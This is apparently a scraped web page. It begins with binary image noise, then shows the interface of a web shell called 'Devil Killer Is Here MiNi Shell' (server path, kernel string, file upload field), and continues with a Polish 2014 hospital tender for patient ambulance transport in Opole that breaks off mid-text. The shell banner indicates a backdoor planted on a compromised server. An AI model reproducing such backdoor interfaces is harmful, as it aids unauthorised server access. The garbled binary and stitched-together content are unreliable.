JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140429/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140429/143832-N-2014.html

<p class="kh_header"><b>Opole: P/10/2014 Usługi w zakresie całodobowego transportu sanitarnego pacjentów.</b><br>
<b>Numer ogłoszenia: 143832 - 2014; data zamieszczenia: 29.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Specjalistyczny Zespół Neuropsychiatryczny im. św. Jadwigi , ul. Wodociągowa 4, 45-221 Opole, woj. opolskie, tel. 077 5414100, faks 077 5414237.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wszn.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> P/10/2014 Usługi w zakresie całodobowego transportu sanitarnego pacjentów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Nazwa zamówienia publicznego: P/10/2014 Usługi w zakresie całodobowego transportu sanitarnego pacjentów.
2. Wspólny słownik zamówień (CPV): 
60130000-8   Usługi w zakresie specjalistycznego transportu drogowego osób.
3. Wykonawca zobowiązany jest do zapewnienia całodobowego zabezpieczenia usług transportu sanitarnego, 7 dni w tygodniu w zakresie:
a) przewozu chorych wymagających konsultacji lekarza specjalisty lub wykonania badań diagnostycznych w innych zakładach opieki zdrowotnej;
b)przewozu chorych do innego zakładu celem kontynuacji leczenia;
c)transportu chorych z dysfunkcją narządu ruchu uniemożliwiającą korzystanie ze środków transportu publicznego po zakończonym leczeniu do miejsca zamieszkania.
4. Zamawiający oświadcza, że podane w Załączniku nr 1A ilości godzin i km  są ilościami szacunkowymi zamówienia  - maksymalnymi (prawo opcji)  i zamówienie to może ulec zmniejszeniu o 20%.
5. Wykonawca realizując zamówienie w ramach poszczególnych pakietów zobligowany jest do dysponowania środkami transportu sanitarnego, posiadającymi niezbędne wyposażenie oraz odpowiadającymi wszelkim wymaganiom, w tym technicznym i higienicznym, określonych przepisami prawa.
6. Wymagany skład osobowy, realizujących przedmiotowe usługi w poszczególnych zespołach  to:
a)Pakiet nr 1 - Zespół Specjalistyczny S - co najmniej 3 osoby uprawnione do wykonywania medycznych czynności ratunkowych w tym lekarza systemu, oraz pielęgniarka systemu lub ratownik medyczny;
b)Pakiet nr 2 - Zespół Podstawowy P - co najmniej dwie osoby uprawnione do wykonywania medycznych czynności ratunkowych w tym pielęgniarka systemu lub ratownik medyczny;
c)Pakiet nr 3 - Zespół Transportowy - dwie osoby, w tym co najmniej jedna uprawniona do wykonywania medycznych czynności ratunkowych. 
7. Zamawiający  zastrzega sobie prawo do przeprowadzania wyrywkowej kontroli pojazdów.
8. Wykonawca zobowiązuje się do prowadzenia sprawozdawczości statystycznej z zakresu prowadzonej działalności zgodnie z obowiązującymi przepisami oraz poddania się kontroli przeprowadzanej przez Opolski Oddział Wojewódzki Narodowego Funduszu Zdrowia w zakresie prawidłowości wykonywania przedmiotu zamówienia.
9. Wykonawca zobowiązany jest do prowadzenia dokumentacji medycznej na zasadach obowiązujących w podmiotach leczniczych oraz  w Wojewódzkim Specjalistycznym Zespole Neuropsychiatrycznym im. św. Jadwigi    w Opolu.
10. Wykonawca zobowiązuje się do stawienia w miejscu określonym w zleceniu lekarskim, w czasie 1 godziny od zgłoszenia (Zespół Podstawowy P, Zespół Transportowy), niezwłocznie - tryb CITO - tj. do 30 min. od momentu zgłoszenia (Zespół Specjalistyczny S) lub w godzinach ustalonych z koordynatorem zleceń Zamawiającego  w przypadku transportów planowych.
11. Wykonawca zobowiązany jest do sprawowania bezpośredniej opieki nad pacjentem od momentu rozpoczęcia usługi transportowej do momentu jej zakończenia. W przypadku przewozu pacjenta na konsultację  bądź badanie diagnostyczne Wykonawca zapewnia powrót pacjenta niezwłocznie po ich zakończeniu.
12. Zakazuje się Wykonawcy świadczenia innych usług w trakcie wykonywania zlecenia Zamawiającego.
13. Wykonawca  zobowiązuje się świadczyć usługi na rzecz Zamawiającego na podstawie pisemnych zleceń lekarskich, po telefonicznym uzgodnieniu miejsca, terminu oraz czasu przewozu i pisemnym potwierdzeniu zlecenia przewozu przez osobę upoważnioną do tego przez Zamawiającego. Zlecenie powinno zawierać datę, godzinę, nazwisko i imię chorego, miejsce docelowego transportu i podpis lekarza kierującego.
14. Zgłaszanie konieczności wykonania usługi będzie dokonywane za pośrednictwem osoby, osób wyznaczonych przez Zamawiającego telefonicznie, na numer wskazany przez Wykonawcę.
15. Cena świadczonych usług transportu sanitarnego naliczana będzie jako suma iloczynu liczby przebytych kilometrów i stawki za jeden kilometr, określonej w cenniku stanowiącym załącznik nr 1A do niniejszej umowy oraz iloczynu efektywnego czasu pracy i ceny jednostkowej określonej w cenniku stanowiącym załącznik nr 1A do niniejszej umowy. Rozliczanie za niepełną godzinę będzie obliczane proporcjonalnie w przeliczeniu na  minuty.
16. Podstawą rozliczeń jest zestawienie miesięczne zleceń wyjazdów z wyszczególnieniem godziny rozpoczęcia i zakończenia usługi, trasy przejazdu oraz liczby przebytych kilometrów według wzoru stanowiącego załącznik do umowy.
17. Ilości kilometrów będą obliczane na podstawie długości trasy przejazdu między siedzibą Zamawiającego, a miejscem określonym w zleceniu na transport pacjenta, wraz z drogą powrotną.
18. Czas pracy Zespołu będzie obliczany od momentu przejęcia pacjenta w siedzibie Zamawiającego, 
do czasu jego powrotu albo przekazania pacjenta do miejsca wskazanego w zleceniu.
19. Jako podstawę do ustalenia trasy przejazdu przyjmuje się najkrótszą możliwa trasę przejazdu. 
W sytuacjach nadzwyczajnych (roboty drogowe, zdarzenia drogowe)  Wykonawca poinformuje o powyższym Zamawiającego w celu ustalenia innej, alternatywnej trasy dojazdu.
20. Zamawiający dopuszcza składania ofert częściowych. Przedmiot zamówienia został podzielony na 3 pakiety. Wykonawca może złożyć ofertę zarówno na wszystkie pakiety, jak i na każdy wybrany przez siebie pakiet.
21. Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt  7 Prawa.
22. Zamawiający nie dopuszcza składania ofert wariantowych.
23. Zamawiający nie dopuszcza podwykonawstwa w zakresie wykonywania przedmiotowej usługi.
24. Termin wykonania zamówienia:
dla pakietu 1 i 3 - od daty podpisania umowy do 02.07.2015 r.;
dla  pakietu  2 - od 02.07.2014 r. do 02.07.2015 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych wymagań w tym zakresie. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych wymagań w tym zakresie. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (załącznik nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełniania warunku dysponowania odpowiednim potencjałem technicznym Zamawiający żąda złożenia oświadczenia w formie wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami. Wzór wykazu stanowi załącznik do SIWZ. Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże się: A) środkami transportu sanitarnego spełniającymi warunki określone w rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002r. W sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2003r. Nr 32, poz. 262 z późn. zm.) - dotyczy wszystkich pakietów; - dla Zespołu Specjalistycznego S - środkiem transportu sanitarnego wyposażonym w : nosze główne przystosowane do reanimacji, komplet pasów; ssak-mechaniczny lub ssak bateryjny lub pneumatyczny; pulsoksymetr przenośny; aparat do mierzenia ciśnienia tętniczego krwi przenośny, różne rozmiary mankietów; glukometr; worek samorozprężalny dla dorosłych z kompletem masek twarzowych i rezerwuarem; stetoskop lekarski; nożyczki do cięcia różnych materiałów; laryngoskop dla dorosłych z kompletem łyżek typu McIntosh; latarka diagnostyczna; torbę podstawową; torbę opatrunkową z kpl. opatrunków; zestaw strzykawek; zestaw igieł i kaniul, w tym zestaw do centralnego wkłucia z dostępu obwodowego; aparaty do toczenia płynów; worki jednorazowe na zużyte materiały; pojemnik na zużyte igły; miski nerkowate (worki) dla pacjentów wymiotujących; rękawiczki jednorazowe (różne rozmiary); rękawiczki sterylne; nożyczki opatrunkowe; poszewki jednorazowe na poduszkę, koc materac noszy; sonda żołądkowa; worki na mocz; tlen medyczny; reduktory z szybkozłączkami i przepływomierzem; maski do tlenoterapii, maski na tracheostomię, wąsy albo kaniule nosowe tlenowe; zestaw rurek intubacyjnych 2.0-10.0; filtry oddechowe; kleszczyki Magilla; prowadnica do intubacji różne rozmiary; krzesełko kardiologiczne; defibrylator - przenośny, akumulatorowy, z możliwością monitorowania EKG; respirator transportowy z zasilaniem gazowym lub bateryjnym; - dla Zespołu Podstawowego P - środkiem transportu wyposażonym w : nosze, koc, poduszkę; aparat do mierzenia ciśnienia tętniczego krwi przenośny, różne rozmiary mankietów; stetoskop lekarski; nożyczki do cięcia różnych materiałów; latarkę diagnostyczną; torbę podstawową, torbę opatrunkową z kpl. opatrunków; zestaw strzykawek; zestaw igieł i kaniul; aparat do toczenia płynów; worki jednorazowe na zużyte materiały; pojemnik na zużyte igły; miski nerkowate (worki) dla pacjentów wymiotujących; rękawiczki jednorazowe (różne rozmiary); rękawiczki sterylne; nożyczki opatrunkowe; poszewki jednorazowe na poduszkę, koc materac noszy; tlen medyczny; reduktory z szybkozłączkami i przepływomierzem, krzesełko kardiologiczne; - dla Zespołu Transportowego - środkiem transportu wyposażonym w : nosze, koc, poduszkę; aparat do mierzenia ciśnienia tętniczego krwi przenośny, różne rozmiary mankietów; stetoskop lekarski; nożyczki do cięcia różnych materiałów; latarkę diagnostyczną; torbę podstawową; torbę opatrunkową z kpl. opatrunków; zestaw strzykawek; zestaw igieł i kaniul; aparat do toczenia płynów; worki jednorazowe na zużyte materiały; pojemnik na zużyte igły; miski nerkowate (worki) dla pacjentów wymiotujących; rękawiczki jednorazowe (różne rozmiary); rękawiczki sterylne; nożyczki opatrunkowe; poszewki jednorazowe na poduszkę, koc materac noszy; tlen medyczny; reduktory z szybkozłączkami i przepływomierzem. UWAGA: Wymagania postawione przez Zamawiającego Wykonawcy dotyczą odpowiednio, każdego z wykonawców składających wspólną ofertę, tj.: potencjał techniczny w sumie musi spełniać wymagane warunki. 2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu oryginał pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust.2b Prawa). Na podstawie złożonych w ofercie dokumentów i oświadczeń Zamawiający dokona oceny czy Wykonawca spełnia warunki postawione przez Zamawiającego w SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych wymagań w tym zakresie. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych wymagań w tym zakresie. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (załącznik nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz OFERTA PRZETARGOWA stanowiący Załącznik nr 1 do niniejszej specyfikacji wraz z wypełnionymi formularzami - Załącznikiem nr 1A stanowiącą  szczegółową specyfikację cenową usług poszczególnych pakietów, Załącznikiem nr 3, 4, 5 i 6  do niniejszej SIWZ.
2. Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa powinna jednoznacznie określać czynności, co do wykonywania, których pełnomocnik jest upoważniony.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wzór umowy stanowi odpowiednio załącznik nr 2 do SIWZ. 2.Dopuszcza się możliwość zmian postanowień zawartych w umowie w przypadku: a) zmiany nazwy, adresu firmy, spowodowane zmianą formy organizacyjno - prawnej, przekształceniem lub połączeniem z inna firmą, 3. Zmiana niniejszej umowy wymaga formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszn.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Specjalistyczny Zespół Neuropsychiatryczny im. św. Jadwigi ul. Wodociągowa 4, 45-221 Opole..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2014 godzina 10:00, miejsce: Oferty należy składać w Sekretariacie Wojewódzkiego Specjalistycznego Zespołu Neuropsychiatrycznego im. św. Jadwigi ul. Wodociągowa 4, 45-221 Opole..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Zespół Specjalistyczny S.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Nazwa zamówienia publicznego: P/10/2014 Usługi w zakresie całodobowego transportu sanitarnego pacjentów.
2.Wspólny słownik zamówień (CPV): 
60130000-8   Usługi w zakresie specjalistycznego transportu drogowego osób.
3.Wykonawca zobowiązany jest do zapewnienia całodobowego zabezpieczenia usług transportu sanitarnego, 7 dni w tygodniu w zakresie:
a)przewozu chorych wymagających konsultacji lekarza specjalisty lub wykonania badań diagnostycznych w innych zakładach opieki zdrowotnej;
b)przewozu chorych do innego zakładu celem kontynuacji leczenia;
c)transportu chorych z dysfunkcją narządu ruchu uniemożliwiającą korzystanie ze środków transportu publicznego po zakończonym leczeniu do miejsca zamieszkania.
4. Zamawiający oświadcza, że podane w Załączniku nr 1A ilości godzin i km  są ilościami szacunkowymi zamówienia  - maksymalnymi (prawo opcji)  i zamówienie to może ulec zmniejszeniu o 20%.
5. Wykonawca realizując zamówienie w ramach poszczególnych pakietów zobligowany jest do dysponowania środkami transportu sanitarnego, posiadającymi niezbędne wyposażenie oraz odpowiadającymi wszelkim wymaganiom, w tym technicznym i higienicznym, określonych przepisami prawa.
6. Wymagany skład osobowy, realizujących przedmiotowe usługi w poszczególnych zespołach  to:
a) Pakiet nr 1 - Zespół Specjalistyczny S - co najmniej 3 osoby uprawnione do wykonywania medycznych czynności ratunkowych w tym lekarza systemu, oraz pielęgniarka systemu lub ratownik medyczny;
b) Pakiet nr 2 - Zespół Podstawowy P - co najmniej dwie osoby uprawnione do wykonywania medycznych czynności ratunkowych w tym pielęgniarka systemu lub ratownik medyczny;
c) Pakiet nr 3 - Zespół Transportowy - dwie osoby, w tym co najmniej jedna uprawniona do wykonywania medycznych czynności ratunkowych. 
7. Zamawiający  zastrzega sobie prawo do przeprowadzania wyrywkowej kontroli pojazdów.
8. Wykonawca zobowiązuje się do prowadzenia sprawozdawczości statystycznej z zakresu prowadzonej działalności zgodnie z obowiązującymi przepisami oraz poddania się kontroli przeprowadzanej przez Opolski Oddział Wojewódzki Narodowego Funduszu Zdrowia w zakresie prawidłowości wykonywania przedmiotu zamówienia.
9. Wykonawca zobowiązany jest do prowadzenia dokumentacji medycznej na zasadach obowiązujących  w podmiotach leczniczych oraz  w Wojewódzkim Specjalistycznym Zespole Neuropsychiatrycznym  im. św. Jadwigi    w Opolu.
10. Wykonawca zobowiązuje się do stawienia w miejscu określonym w zleceniu lekarskim, w czasie 1 godziny od zgłoszenia (Zespół Podstawowy P, Zespół Transportowy), niezwłocznie - tryb CITO - tj. do 30 min. od momentu zgłoszenia (Zespół Specjalistyczny S) lub w godzinach ustalonych z koordynatorem zleceń Zamawiającego  w przypadku transportów planowych.
11. Wykonawca zobowiązany jest do sprawowania bezpośredniej opieki nad pacjentem od momentu rozpoczęcia usługi transportowej do momentu jej zakończenia. W przypadku przewozu pacjenta na konsultację  bądź badanie diagnostyczne Wykonawca zapewnia powrót pacjenta niezwłocznie po ich zakończeniu.
12. Zakazuje się Wykonawcy świadczenia innych usług w trakcie wykonywania zlecenia Zamawiającego.
13. Wykonawca  zobowiązuje się świadczyć usługi na rzecz Zamawiającego na podstawie pisemnych zleceń lekarskich, po telefonicznym uzgodnieniu miejsca, terminu oraz czasu przewozu i pisemnym potwierdzeniu zlecenia przewozu przez osobę upoważnioną do tego przez Zamawiającego. Zlecenie powinno zawierać datę, godzinę, nazwisko i imię chorego, miejsce docelowego transportu i podpis lekarza kierującego.
14. Zgłaszanie konieczności wykonania usługi będzie dokonywane za pośrednictwem osoby/osób wyznaczonych przez Zamawiającego telefonicznie, na numer wskazany przez Wykonawcę.
15. Cena świadczonych usług transportu sanitarnego naliczana będzie jako suma iloczynu liczby przebytych kilometrów i stawki za jeden kilometr, określonej w cenniku stanowiącym załącznik nr 1A do niniejszej umowy oraz iloczynu efektywnego czasu pracy i ceny jednostkowej określonej w cenniku stanowiącym załącznik nr 1A do niniejszej umowy. Rozliczanie za niepełną godzinę będzie obliczane proporcjonalnie w przeliczeniu na  minuty.
16. Podstawą rozliczeń jest zestawienie miesięczne zleceń wyjazdów z wyszczególnieniem godziny rozpoczęcia i zakończenia usługi, trasy przejazdu oraz liczby przebytych kilometrów według wzoru stanowiącego załącznik do umowy.
17. Ilości kilometrów będą obliczane na podstawie długości trasy przejazdu między siedzibą Zamawiającego, a miejscem określonym w zleceniu na transport pacjenta, wraz z drogą powrotną.
